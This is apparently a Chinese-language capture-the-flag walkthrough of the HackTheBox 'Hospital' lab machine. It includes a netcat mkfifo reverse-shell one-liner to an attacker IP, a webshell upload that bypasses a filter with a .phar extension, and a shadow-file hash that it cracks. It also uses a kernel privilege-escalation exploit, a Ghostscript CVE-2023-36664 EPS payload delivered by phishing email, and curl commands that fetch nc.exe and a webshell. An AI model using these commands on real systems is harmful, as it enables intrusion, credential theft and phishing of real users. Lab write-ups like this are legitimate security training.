HTB-Hospital
HTB-Hospital靶机,windows内网渗透靶机,中等难度
一、端口扫描
nmap先扫描一下端口情况
把扫描到的端口整理一下,方便后续进一步扫描
1 | ┌──(kali㉿kali)-[~/box/nmap] |
详细端口扫描
本次扫描还是获取到不少信息,发现子域名DC.hospital.htb,88,,443,8080,3389等端口都是开放的,先将收集到的域名加入本地host方便接下来操作
二、Web渗透
先看看443端口,打开后是个mail登录页面,弱口令没有尝试出来,先放到一旁稍后再看
再看看8080端口有什么,打开后是一个医院登录界面
这个页面直接尝试弱口令登录了:admin/123456
看到有个上传功能,那就先测试有没有文件上传漏洞
经过测试限制文件后缀只能上传图片,用bp抓包修改后缀试试
bp抓包修改后缀名为php上传失败
多尝试了几个后缀,发现修改后缀名为phar时上传成功
接下来fuzz一下目录,看看哪里可以访问到上传后的文件
注意到上面扫描结果中有个uploads,进入看看,成功读取到刚才上传的shell
接下来上传一个真正的webshell上去,成功getshell
三、获取userflag
由于这个webshell提权不方便,先反弹一个shell到本机
1 | rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.14.13 1234 >/tmp/f |
经过一顿折腾,发现这台机器具有内核漏洞,可以用这个项目提权:https://github.com/briskets/CVE-2021-3493/tree/main
本地起一个http服务,上传到靶机,运行后成功提权至root
查看它shadow文件时,发现了user:drwilliams
1 | drwilliams:$6$uWBSeTcoXXTBRkiL$S9ipksJfiZuO4bFI6I9w/iItu5.Ohoz3dABeF6QWumGBspUW378P1tlwak7NqzouoRTbrz6Ag0qcyGQxW192y/:19612:0:99999:7::: |
copy到本地,用john破解一下
这个账号密码经尝试登录ssh无可用信息,但是发现可以登录之前443端口那个网页
进去之后发现有一封邮件,大意就是需要我们给他设计一个eps格式的文件,以便他可以使用GhostScript可视化,这就意味着我们可以给他发送一个带有后门的eps格式文件,他们收到后会执行,就是送上门的钓鱼环境!
使用这个项目:https://github.com/jakabakos/CVE-2023-36664-Ghostscript-command-injection
按照项目提示,先生成一个eps文件
1 | python CVE_2023_36664_exploit.py --generate --revshell -ip 10.10.14.13 -port 2222 --filename qwe --extension eps |
然后注入payload
1 | python CVE_2023_36664_exploit.py --inject --payload "curl 10.10.14.13:8081/nc.exe -o nc.exe" --filename qwe.eps |
然后回复邮件,把我们生成的文件发送给他,等待他执行,获取shell
获取到userflag
四、获取rootflag
经过一顿乱找,在C盘找到了xampp文件夹,XAMPP是一款非常优秀Apache+MYSQL+PHP的服务器系统开发套件,具体简介看下图
进去之后有个htdocs文件夹
使用icacls htdocs查看一下权限
该文件夹具有system权限,也就意味着我在这个文件夹上传一个webshell,它就具有system的执行权限,这个是医院网站的根目录
1 | curl http://10.10.14.13:8081/shell.php -o shell1.php |
访问shell1.php,成功获取到system权限
获取到rootflag,本台靶机完全攻破!
